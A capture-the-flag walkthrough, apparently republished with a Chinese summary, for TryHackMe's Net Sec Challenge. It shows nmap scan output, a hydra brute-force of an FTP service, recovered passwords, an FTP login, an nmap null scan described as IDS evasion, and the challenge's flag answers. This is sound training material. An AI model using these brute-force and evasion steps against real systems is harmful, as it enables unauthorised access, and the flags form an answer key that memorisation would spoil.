Net Sec Challenge — TryHackMe Walkthrough
本文描述了一次网络安全技能测试,使用nmap、telnet和hydra工具进行端口扫描、服务检测和密码破解。通过扫描发现多个开放端口(如22、80、139、445、8080和10021),并提取隐藏在SSH和HTTP服务器中的旗帜。最终通过FTP获取了隐藏的旗帜THM{321452667098}。 2025-10-6 06:58:13 Author: infosecwriteups.com(查看原文) 阅读量:40 收藏

Death Esther

Practice the skills you have learned in the Network Security module.

Press enter or click to view image in full size

Task 1. Introduction

Use this challenge to test your mastery of the skills you have acquired in the Network Security module. All the questions in this challenge can be solved using only nmap, telnet, and hydra.

Answer: No need

Task 2. Challenge Questions

Starting with an Nmap aggressive scan and service/version detection across all ports:

nmap -sV -p- 10.201.27.157 -A

PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
80/tcp open http lighttpd
|_http-server-header: lighttpd THM{web_server_25352}
|_http-title: Hello, world!
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
8080/tcp open http Node.js (Express middleware)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
10021/tcp open ftp vsftpd 3.0.5

Question: What is the highest port number being open less than 10,000?

Answer: 8080

Question: There is an open port outside the common 1000 ports; it is above 10,000. What is it?

Answer: 10021

Question: How many TCP ports are open?

Answer: 6

Question: What is the flag hidden in the HTTP server header?

Answer: THM{web_server_25352}

Question: What is the flag hidden in the SSH server header?

Answer: THM{946219583339}

Question: We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

Answer: vsftpd 3.0.5

Hydra

Create a file with both usernames:

echo "eddie
quinn" > user.txt

Run Hydra to brute-force FTP on port 10021 using the rockyou wordlist:

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp://10.201.27.157:10021

Credentials:

login: eddie   password: jordan
login: quinn password: andrea

FTP Access & Flag

We found an FTP service on a non‑standard port and connected to it using the credentials we recovered:

ftp 10.201.27.157 10021
Name (10.201.27.157:root): quinn
Password: andrea

Login succeeded:

230 Login successful.
ftp> ls
-rw-rw-r-- 1 1002 1002 18 Sep 20 2021 ftp_flag.txt

We downloaded the file and read the flag:

ftp> get ftp_flag.txt
# then on attacker machine
cat ftp_flag.txt

Question: We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

Answer: THM{321452667098}

To avoid detection by the IDS, use:

nmap -sN <ip>

Question: Browsing to http://MACHINE_IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

Answer: THM{f7443f99}

Press enter or click to view image in full size


文章来源: https://infosecwriteups.com/net-sec-challenge-tryhackme-walkthrough-e553bda3c5a5?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh